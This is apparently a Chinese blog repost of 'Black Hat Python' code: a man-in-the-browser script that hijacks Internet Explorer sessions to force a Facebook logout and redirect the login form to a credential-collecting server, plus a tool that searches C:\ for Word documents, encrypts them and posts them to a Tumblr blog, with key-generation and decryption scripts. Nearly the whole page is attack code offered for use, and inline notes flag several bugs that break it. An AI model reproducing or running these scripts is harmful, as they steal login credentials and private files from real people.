• Python黑帽子:浏览器的中间人攻击


    基于浏览器的中间人攻击

    #coding=utf-8
    import win32com.client
    import time
    import urlparse
    import urllib
    
    # URL of the credential-collection server (the receiver script below).
    data_receiver = "http://localhost:8080/"
    
    # Per-site configuration: how to force a logout and which login form to hijack.
    target_sites = {}
    target_sites["www.facebook.com"] = {
        "logout_url" : None,
        "logout_form" : "logout_form",
        "login_form_index" : 0,
        "owned" : False
    }
    
    # COM class id of the Internet Explorer browser (used to enumerate IE windows).
    clsid = '{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'
    
    windows = win32com.client.Dispatch(clsid)
    
    # Poll every IE window forever, looking for visits to the target sites.
    # NOTE(review): wait_for_browser is defined *after* this infinite loop in
    # this transcription, so the calls below raise NameError at runtime; in the
    # published book the function definition comes first.
    while True:
        for browser in windows:
            url = urlparse.urlparse(browser.LocationUrl)
            if url.hostname in target_sites:
                if target_sites[url.hostname]["owned"]:
                    continue
                # If we have a logout URL, redirect the browser to it.
                if target_sites[url.hostname]["logout_url"]:
                    browser.Navigate(target_sites[url.hostname]["logout_url"])
                    wait_for_browser(browser)
                else:
                    # Retrieve every element in the document.
                    full_doc = browser.Document.all
                    # Walk the elements looking for the logout form.
                    for i in full_doc:
                        try:
                            # Find the logout form and submit it.
                            # NOTE(review): this compares i.id against the
                            # "logout_url" entry (None for this site); it almost
                            # certainly should read "logout_form" -- confirm
                            # against the book's original listing.
                            if i.id == target_sites[url.hostname]["logout_url"]:
                                i.submit()
                                wait_for_browser(browser)
                        except:
                            # Bare except: many COM elements lack .id/.submit.
                            pass
    
                # Now rewrite the login form so it posts to our receiver.
                try:
                    login_index = target_sites[url.hostname]["login_form_index"]
                    login_page = urllib.quote(browser.LocationUrl)
                    browser.Document.forms[login_index].action = "%s%s"%(data_receiver,login_page)
                    target_sites[url.hostname]["owned"] = True
                except:
                    pass
        time.sleep(5)
    
    def wait_for_browser(browser):
        """Block until the IE COM object reports the current page is loaded."""
        # READYSTATE_COMPLETE is 4; some hosts report the string "complete".
        finished_states = (4, "complete")
        while browser.ReadyState not in finished_states:
            time.sleep(0.1)

    创建接收服务器

    import SimpleHTTPServer
    import SocketServer
    import urllib
    
    class CredRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
        """Handler that prints POSTed form data and redirects the client
        back to the original page encoded in the request path."""
        def do_POST(self):
            # Body length comes from the Content-Length request header.
            content_length = int(self.headers['Content-Length'])
            creds = self.rfile.read(content_length).decode('utf-8')
            print creds
            # The path (minus the leading "/") is the URL-quoted origin page.
            site = self.path[1:]
            self.send_response(301)
            # NOTE(review): BaseHTTPRequestHandler defines send_header
            # (singular); send_headers raises AttributeError -- likely a typo.
            self.send_headers('Location',urllib.unquote(site))
            self.end_headers()
    
    # Listen on every interface, port 8080, serving requests with the handler above.
    server = SocketServer.TCPServer(('0.0.0.0',8080),CredRequestHandler)
    server.serve_forever()

    利用IE的COM组件自动化技术窃取数据

    keygen.py:

    #!/usr/bin/python
    from Crypto.PublicKey import RSA
    
    new_key = RSA.generate(2048,e=65537)
    public_key = new_key.publickey().exportKey("PEM")
    private_key = new_key.exportKey("PEM")
    
    print public_key
    print private_key

    decrypto.py:

    #coding=utf-8  
    import zlib  
    import base64  
    from Crypto.PublicKey import RSA  
    from Crypto.Cipher import PKCS1_OAEP  
      
    private_key = "输入产生的公钥"  
      
    rsakey = RSA.importKey(private_key)  
    rsakey = PKCS1_OAEP.new(rsakey)  
      
    chunk_size = 256  
    offset = 0  
    decrypted = ""  
    encrypted = base64.b64decode(encrypted)  
      
    while offset < len(encrypted):  
        decrypted += rsakey.decrypted(encrypted[offset:offset+chunk_size])  
        offset += chunk_size  
      
    #解压负载  
    plaintext = zlib.decompress(decrypted)  
      
    print plaintext  

     这段代码先将发布在tumblr上的编码数据进行base64解码,再用私钥逐块解密还原出原始的明文字符串,最后对负载进行zlib解压。

    ie_exfil.py:

    #coding=utf-8
    import win32com.client
    import os
    import fnmatch
    import time
    import random
    import zlib
    from Crypto.PublicKey import RSA
    from Crypto.Cipher import PKCS1_OAEP
    
    # File extension to hunt for on the local filesystem.
    doc_type = ".doc"
    # Tumblr account the encrypted posts are published under.
    username = "lyshark"
    password = "123123123"
    
    # PEM public key produced by keygen.py goes here.
    public_key = "公钥"
    
    def wait_for_browser(browser):
        """Poll the IE COM object until the current navigation has finished."""
        loaded = False
        while not loaded:
            state = browser.ReadyState
            # 4 == READYSTATE_COMPLETE; some providers hand back "complete".
            loaded = state == 4 or state == "complete"
            if not loaded:
                time.sleep(0.1)
        return
    
    def encrypt_string(plaintext):
        """zlib-compress plaintext, RSA/OAEP-encrypt it in fixed-size chunks
        using the module-level public_key, and return the ciphertext
        base64-encoded (py2 str in, py2 str out)."""
        chunk_size = 256
        print "Compressing: %d bytes"%len(plaintext)
        plaintext = zlib.compress(plaintext)
    
        print "Encrypting %d bytes"%len(plaintext)
    
        rsakey = RSA.importKey(public_key)
        rsakey = PKCS1_OAEP.new(rsakey)
    
        encrypted = ""
        offset = 0
    
        while offset < len(plaintext):
            chunk = plaintext[offset:offset+chunk_size]
    
            # Pad the final short chunk up to chunk_size with spaces.
            # NOTE(review): the padding survives decryption, so the receiving
            # side's zlib.decompress sees trailing garbage; a length prefix
            # would be safer.
            if len(chunk) % chunk_size != 0:
                chunk += " " * (chunk_size - len(chunk))
    
            # NOTE(review): PKCS1_OAEP with a 2048-bit key accepts at most
            # 256 - 2*20 - 2 = 214 bytes per call; 256-byte chunks make
            # PyCrypto raise "Plaintext is too long" -- confirm chunk_size.
            encrypted += rsakey.encrypt(chunk)
            offset += chunk_size
    
        # py2 str.encode("base64"): MIME base64 with embedded newlines.
        encrypted = encrypted.encode("base64")
    
        print "Base64 encoded crypto: %d"%len(encrypted)
    
        return encrypted
    
    def encrypt_post(filename):
        """Read *filename* and return (encrypted file name, encrypted contents)."""
        # Slurp the whole file as raw bytes; the with-block closes the handle.
        with open(filename,"rb") as handle:
            raw = handle.read()
    
        return encrypt_string(filename),encrypt_string(raw)
    
    def random_sleep():
        """Pause 5-10 whole seconds so the browser automation looks less robotic."""
        delay = random.randint(5,10)
        time.sleep(delay)
    
    def login_to_tumblr(ie):
        """Fill tumblr's login form with the module-level username/password,
        submit it, and wait for the resulting navigation to finish."""
        # Every element in the current document.
        full_doc = ie.Document.all
    
        # Walk the elements looking for the e-mail / password inputs.
        for i in full_doc:
            if i.id == "signup_email":
                i.setAttribute("value",username)
            elif i.id == "signup_password":
                i.setAttribute("value",password)
    
        random_sleep()
    
        try:
            # Different login landing pages place the form at index 0 or 1.
            if  ie.Document.forms[0].id == "signup_form":
                ie.Document.forms[0].submit()
            else:
                ie.Document.forms[1].submit()
        except IndexError, e:
            # Fewer forms than expected -- best effort, carry on.
            pass
    
        random_sleep()
    
        # Let the post-login page finish loading.
        wait_for_browser(ie)
    
        return
    
    def post_to_tumblr(ie,title,post):
        """Fill tumblr's new-text-post form with *title* and *post*, then
        click the post button and wait for the page to settle."""
        full_doc = ie.Document.all
    
        for i in full_doc:
            if i.id == "post_one":
                # Title input field.
                i.setAttribute("value",title)
                title_box = i
                i.focus()
            elif i.id == "post_two":
                # Body text area -- filled via innerHTML.
                i.setAttribute("innerHTML",post)
                print "Set text area"
                i.focus()
            elif i.id == "create_post":
                print "Found post button"
                post_form = i
                i.focus()
    
        # Move focus off the body field so the page registers the content.
        # NOTE(review): if the expected element ids are not found above,
        # title_box / post_form are never bound and the lines below raise
        # UnboundLocalError.
        random_sleep()
        title_box.focus()
        random_sleep()
    
        # Submit via the button's first child element.
        post_form.children[0].click()
        wait_for_browser(ie)
    
        random_sleep()
    
        return
    
    def exfiltrate(document_path):
        """Encrypt the file at *document_path* and publish it as a new
        tumblr text post via a fresh IE automation instance."""
        ie = win32com.client.Dispatch("InternetExplorer.Application")
        # Show the browser window (1 == visible).
        ie.Visible = 1
    
        # Browse to tumblr and log in.
        ie.Navigate("https://www.tumblr.com/login")
        wait_for_browser(ie)
    
        print "Logging in..."
        login_to_tumblr(ie)
        print "Logged in...navigating"
    
        ie.Navigate("https://www.tumblr.com/new/text")
        wait_for_browser(ie)
    
        # Encrypt the file name (title) and contents (body).
        title,body = encrypt_post(document_path)
    
        print "Creating new post..."
        post_to_tumblr(ie,title,body)
        print "Posted!"
    
        # Tear down the IE instance.
        ie.Quit()
        ie = None
    
        return
    
    #用户文档检索的循环
    #注意:以下这段代码的第一行没有“tab”缩进
    for parent,directories,filenames in os.walk("C:\"):
        for filename in fnmatch.filter(filenames,"*%s"%doc_type):
            document_path = os.path.join(parent,filename)
            print "Found: %s"%document_path
            exfiltrate(document_path)
            raw_input("Continue?")

    代码用于捕获本地文件系统中的Word文档,并利用公钥对其进行加密,然后自动启动进程将加密的文档提交到一个位于tumblr.com站点的博客上

  • 相关阅读:
    网络
    分区
    JavaScript概述
    CSS样式属性
    css选择器
    CSS的引入方式
    css介绍
    HTML结构
    常用标签
    HTML介绍
  • 原文地址:https://www.cnblogs.com/LyShark/p/9102611.html
Copyright © 2020-2023  润新知